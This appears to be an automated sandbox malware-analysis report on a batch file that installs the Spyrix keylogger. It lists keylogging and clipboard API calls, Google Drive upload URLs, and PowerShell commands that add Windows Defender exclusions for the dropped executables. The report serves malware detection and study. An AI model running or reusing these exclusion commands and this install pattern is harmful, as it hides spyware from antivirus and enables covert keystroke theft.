Source: spkl.exe String found in binary or memory: https://www.googleapis.com/drive/v2/files
Source: spkl.exe, spkl.exe, 00000038.00000003.2416007307.00000000044A0000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000038.00000002.2673755823.0000000000401000.00000040.00000001.01000000.00000014.sdmp String found in binary or memory: https://www.googleapis.com/drive/v2/files/
Source: spkl.exe, 00000038.00000003.2416007307.00000000044A0000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000038.00000002.2673755823.0000000000401000.00000040.00000001.01000000.00000014.sdmp String found in binary or memory: https://www.googleapis.com/drive/v2/files/U
Source: spkl.exe, spkl.exe, 00000038.00000003.2416007307.00000000044A0000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000038.00000002.2673755823.0000000000401000.00000040.00000001.01000000.00000014.sdmp String found in binary or memory: https://www.googleapis.com/drive/v2/files?maxResults=1000&q=
Source: spkl.exe, 00000038.00000003.2416007307.00000000044A0000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000038.00000002.2673755823.0000000000401000.00000040.00000001.01000000.00000014.sdmp String found in binary or memory: https://www.googleapis.com/drive/v2/filesU
Source: spkl.exe, spkl.exe, 00000038.00000003.2416007307.00000000044A0000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000038.00000002.2673755823.0000000000401000.00000040.00000001.01000000.00000014.sdmp String found in binary or memory: https://www.googleapis.com/oauth2/v1/userinfo
Source: spkl.exe, spkl.exe, 00000038.00000003.2416007307.00000000044A0000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000038.00000002.2673755823.0000000000401000.00000040.00000001.01000000.00000014.sdmp String found in binary or memory: https://www.googleapis.com/upload/drive/v2/files/
Source: spkl.exe String found in binary or memory: https://www.googleapis.com/upload/drive/v2/files?uploadType=resumable
Source: spkl.exe, 00000038.00000003.2416007307.00000000044A0000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000038.00000002.2673755823.0000000000401000.00000040.00000001.01000000.00000014.sdmp String found in binary or memory: https://www.googleapis.com/upload/drive/v2/files?uploadType=resumableSV
Source: spkl.exe, 00000038.00000002.2742570837.000000000457B000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000038.00000003.2422306843.00000000044CC000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000038.00000002.2691175840.0000000000915000.00000040.00000001.01000000.00000014.sdmp String found in binary or memory: https://www.spyrix.com
Source: spkl.exe, 00000038.00000003.2422306843.00000000044CC000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000038.00000002.2691175840.0000000000915000.00000040.00000001.01000000.00000014.sdmp String found in binary or memory: https://www.spyrix.com/purchase.php?prg=sfk
Source: spkl.exe, 00000038.00000002.2742570837.000000000457B000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.spyrix.com/purchase.php?prg=sfkq
Source: is-1I8EP.tmp.22.dr String found in binary or memory: https://www.spyrix.com/spyrix-personal-monitor.php
Source: spkl.exe, 00000038.00000002.2750231481.0000000006AE8000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.spyrix.come
Source: unknown HTTPS traffic detected: 23.109.93.100:443 -> 192.168.2.8:49706 version: TLS 1.2
Source: unknown HTTPS traffic detected: 23.109.93.100:443 -> 192.168.2.8:49707 version: TLS 1.2
Source: unknown HTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.8:49710 version: TLS 1.2
Source: unknown HTTPS traffic detected: 167.114.14.170:443 -> 192.168.2.8:49718 version: TLS 1.2
Source: unknown HTTPS traffic detected: 167.114.14.168:443 -> 192.168.2.8:49723 version: TLS 1.2
Source: unknown HTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.8:49725 version: TLS 1.2
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe Code function: 56_2_03376312 OpenClipboard, 56_2_03376312
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe Code function: 56_2_03376342 SetClipboardData, 56_2_03376342
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe Code function: 56_2_03376292 GetAsyncKeyState, 56_2_03376292
Source: spkl.exe, 00000038.00000003.2463770812.0000000004DAE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: GetRawInputData memstr_00294fb9-0

System Summary

Source: is-9U2JI.tmp.22.dr Static PE information: section name:
Source: is-719F1.tmp.22.dr Static PE information: section name:
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp Process created: C:\Windows\SysWOW64\regedit.exe "regedit.exe" /e "C:\ProgramData\Spyrix Free Keylogger\temp\reg\info.uid" "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Uninstall\Spyrix Free Keylogger_is1"
Source: C:\Windows\SysWOW64\wscript.exe COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath "'C:\Users\user\AppData\Local\Temp\183942631522663'"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath "'C:\Users\user\AppData\Local\Temp\c8f0ad90-24c5-4e6e-bb8b-4ca36210d878'"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Remove-MpPreference -exclusionPath "C:\Users\user\AppData\Local\Temp\183942631522663"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -ExclusionProcess '[space]= .*'
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath 'C:\ProgramData\Security Monitor\'
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -ExclusionProcess 'C:\ProgramData\Security Monitor\*'
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe'
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\sps.exe'
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spmm.exe'
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -ExclusionProcess 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe'
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -ExclusionProcess 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\sps.exe'
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -ExclusionProcess 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spmm.exe'
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c plist.cmd
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe Code function: 56_2_03376252 NtdllDefWindowProc_A, 56_2_03376252
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe Code function: 56_2_03375FFA: DeviceIoControl, 56_2_03375FFA
Source: C:\Windows\System32\svchost.exe File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe Code function: 7_2_02CBDC34 7_2_02CBDC34
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe Code function: 7_2_053C6E90 7_2_053C6E90
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe Code function: 7_2_053C0013 7_2_053C0013
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe Code function: 7_2_053C0040 7_2_053C0040
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe Code function: 7_2_053C6E80 7_2_053C6E80
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe Code function: 7_2_053CD937 7_2_053CD937
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe Code function: 7_2_053CD948 7_2_053CD948
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe Code function: 7_2_08EB0D98 7_2_08EB0D98
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe Code function: 7_2_0A660040 7_2_0A660040
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe Code function: 7_2_0A66A920 7_2_0A66A920
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe Code function: 7_2_0A662DF0 7_2_0A662DF0
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe Code function: 56_2_008695C1 56_2_008695C1
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe Code function: 56_2_0338110C 56_2_0338110C
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe Code function: 56_2_03380538 56_2_03380538
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe Code function: 56_2_03396654 56_2_03396654
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe Code function: 56_2_033AE88C 56_2_033AE88C
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe Code function: 56_2_033A1D50 56_2_033A1D50
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe Code function: 71_2_0037B890 71_2_0037B890
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe Code function: 71_2_003720F0 71_2_003720F0
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe Code function: 71_2_0036A132 71_2_0036A132
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe Code function: 71_2_003D0130 71_2_003D0130
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe Code function: 71_2_00384170 71_2_00384170
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe Code function: 71_2_003DA140 71_2_003DA140
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe Code function: 71_2_0036A132 71_2_0036A132
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe Code function: 71_2_003BA340 71_2_003BA340
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe Code function: 71_2_0038E590 71_2_0038E590
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe Code function: 71_2_0038F5D0 71_2_0038F5D0
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe Code function: 71_2_005E85B0 71_2_005E85B0
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe Code function: 71_2_00370620 71_2_00370620
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe Code function: 71_2_003B66B0 71_2_003B66B0
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe Code function: 71_2_003836A0 71_2_003836A0
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe Code function: 71_2_003976C0 71_2_003976C0
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe Code function: 71_2_003BA7B0 71_2_003BA7B0
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe Code function: 71_2_003959E0 71_2_003959E0
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe Code function: 71_2_00379A20 71_2_00379A20
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe Code function: 71_2_00392A9D 71_2_00392A9D
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe Code function: 71_2_003D8C20 71_2_003D8C20
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe Code function: 71_2_00389D10 71_2_00389D10
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe Code function: 71_2_00361F10 71_2_00361F10
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe Code function: 71_2_00376F90 71_2_00376F90
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe Code function: 73_3_031D2587 73_3_031D2587
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe Code function: 73_3_031D2AFE 73_3_031D2AFE
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe Code function: 73_3_031D1E7B 73_3_031D1E7B
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe Code function: 73_3_031D1E63 73_3_031D1E63
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe Code function: String function: 0339565C appears 36 times
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe Code function: String function: 00369DB0 appears 70 times
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe Code function: String function: 00373380 appears 47 times
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe Code function: String function: 00397140 appears 140 times
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe Code function: String function: 00373610 appears 43 times
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe Code function: String function: 005ED1E8 appears 58 times
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe Code function: String function: 00396FB0 appears 191 times
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe Code function: String function: 00363850 appears 34 times
Source: [space]= .tmp.19.dr Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: [space]= .tmp.19.dr Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Source: is-NNSLF.tmp.22.dr Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: is-NNSLF.tmp.22.dr Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Source: is-719F1.tmp.22.dr Static PE information: Resource name: RT_BITMAP type: DOS executable (COM)
Source: is-719F1.tmp.22.dr Static PE information: Resource name: RT_STRING type: COM executable for DOS
Source: is-719F1.tmp.22.dr Static PE information: Resource name: RT_RCDATA type: COM executable for DOS
Source: is-1I5NJ.tmp.22.dr Static PE information: Number of sections : 18 > 10
Source: is-719F1.tmp.22.dr Static PE information: Number of sections : 13 > 10
Source: is-67IFD.tmp.22.dr Static PE information: Number of sections : 11 > 10
Source: ffws.exe.56.dr Static PE information: Number of sections : 11 > 10
Source: is-9U2JI.tmp.22.dr Static PE information: Number of sections : 13 > 10
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe reg query "HKU\S-1-5-19\Environment"
Source: [space]= .exe.6.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: is-9U2JI.tmp.22.dr Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESERVED size: 0x100000 address: 0x0
Source: is-719F1.tmp.22.dr Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESERVED size: 0x100000 address: 0x0
Source: is-9U2JI.tmp.22.dr Static PE information: Section: ZLIB complexity 1.0016526442307692
Source: is-9U2JI.tmp.22.dr Static PE information: Section: ZLIB complexity 1.0005696614583333
Source: is-9U2JI.tmp.22.dr Static PE information: Section: ZLIB complexity 1.0007161458333333
Source: is-9U2JI.tmp.22.dr Static PE information: Section: ZLIB complexity 1.021484375
Source: is-9U2JI.tmp.22.dr Static PE information: Section: ZLIB complexity 1.0003823138297872
Source: is-719F1.tmp.22.dr Static PE information: Section: ZLIB complexity 1.0017903645833333
Source: is-719F1.tmp.22.dr Static PE information: Section: ZLIB complexity 1.0005696614583333
Source: is-719F1.tmp.22.dr Static PE information: Section: ZLIB complexity 1.0008680555555556
Source: is-719F1.tmp.22.dr Static PE information: Section: ZLIB complexity 1.021484375
Source: is-719F1.tmp.22.dr Static PE information: Section: ZLIB complexity 1.0003551136363635
Source: [space]= .exe.6.dr, Settings.cs Base64 encoded string: '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'
Source: classification engine Classification label: mal100.troj.evad.winBAT@160/1077@15/9
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe Code function: 71_2_0037A2A0 GetLastError,_errno,strncpy,FormatMessageA,strrchr,strrchr,_errno,_errno,GetLastError,SetLastError, 71_2_0037A2A0
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe Code function: 56_2_03376092 GetDiskFreeSpaceA, 56_2_03376092
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe Code function: 71_2_00363700 memset,GetLastError,CreateToolhelp32Snapshot,GetLastError,Module32First,Module32Next,CloseHandle, 71_2_00363700
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\[space]= .exe.log Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2456:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2224:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7576:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7172:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6444:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7756:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1316:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1712:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2476:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7788:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3148:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8092:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7592:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6072:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7844:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3864:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7892:120:WilError_03
Source: C:\Windows\System32\cmd.exe File created: C:\Users\user\AppData\Local\Temp\183942631522663 Jump to behavior
Source: Yara match File source: 77.0.spmm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000004D.00000000.2580594653.0000000000401000.00000020.00000001.01000000.00000018.sdmp, type: MEMORY
Source: Yara match File source: 00000038.00000003.2416007307.00000000044A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000038.00000002.2673755823.0000000000401000.00000040.00000001.01000000.00000014.sdmp, type: MEMORY
Source: Yara match File source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-EO3DV.tmp, type: DROPPED
Source: unknown Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\D0WmCTD2qO.bat" "
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\plist.vbs"
Source: C:\Users\user\AppData\Local\Temp\c8f0ad90-24c5-4e6e-bb8b-4ca36210d878\[space]= .exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spmm.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'SEM.EXE'
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "cmd.exe" OR Caption = "wlg.exe" OR Caption = "spmm.exe" OR Caption = "spkl.exe" OR Caption = "spm.exe" OR Caption = "sem.exe" OR Caption = "clv.exe" OR Caption = "akl.exe" OR Caption = "sps.exe" OR Caption = "sime64.exe" OR Caption = "ff.exe" OR Caption = "mrec.exe" OR Caption = "clvhost.exe" OR Caption = "ffws.exe")
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Windows\SysWOW64\tasklist.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'SPM.EXE'
Source: C:\Windows\SysWOW64\tasklist.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'SEM.EXE'
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Windows\System32\reg.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganization
Source: spmm.exe, 0000004D.00000002.2690607250.0000000061E8A000.00000002.00000001.01000000.00000015.sdmp Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: spmm.exe, 0000004D.00000002.2690607250.0000000061E8A000.00000002.00000001.01000000.00000015.sdmp Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: spmm.exe, 0000004D.00000002.2690607250.0000000061E8A000.00000002.00000001.01000000.00000015.sdmp Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0
Source: spmm.exe, 0000004D.00000002.2690607250.0000000061E8A000.00000002.00000001.01000000.00000015.sdmp Binary or memory string: CREATE TABLE "%w"."%w_node"(nodeno INTEGER PRIMARY KEY, data BLOB);CREATE TABLE "%w"."%w_rowid"(rowid INTEGER PRIMARY KEY, nodeno INTEGER);CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY, parentnode INTEGER);INSERT INTO '%q'.'%q_node' VALUES(1, zeroblob(%d))
Source: spmm.exe, 0000004D.00000002.2690607250.0000000061E8A000.00000002.00000001.01000000.00000015.sdmp Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: spmm.exe, 0000004D.00000002.2690607250.0000000061E8A000.00000002.00000001.01000000.00000015.sdmp Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: spmm.exe, 0000004D.00000002.2690607250.0000000061E8A000.00000002.00000001.01000000.00000015.sdmp Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: spmm.exe, 0000004D.00000002.2690607250.0000000061E8A000.00000002.00000001.01000000.00000015.sdmp Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: spmm.exe, 0000004D.00000002.2690607250.0000000061E8A000.00000002.00000001.01000000.00000015.sdmp Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: spkl.exe, 00000038.00000002.2756912357.00000000077BD000.00000004.00000020.00020000.00000000.sdmp, spkl.exe, 00000038.00000002.2750231481.0000000006AC6000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: CREATE TABLE if not exists `wlog` (`id` INTEGER PRIMARY KEY AUTOINCREMENT,`sTime`TEXT,`sJSon`TEXT);
Source: spmm.exe, 0000004D.00000002.2690607250.0000000061E8A000.00000002.00000001.01000000.00000015.sdmp Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: spmm.exe, 0000004D.00000002.2690607250.0000000061E8A000.00000002.00000001.01000000.00000015.sdmp Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
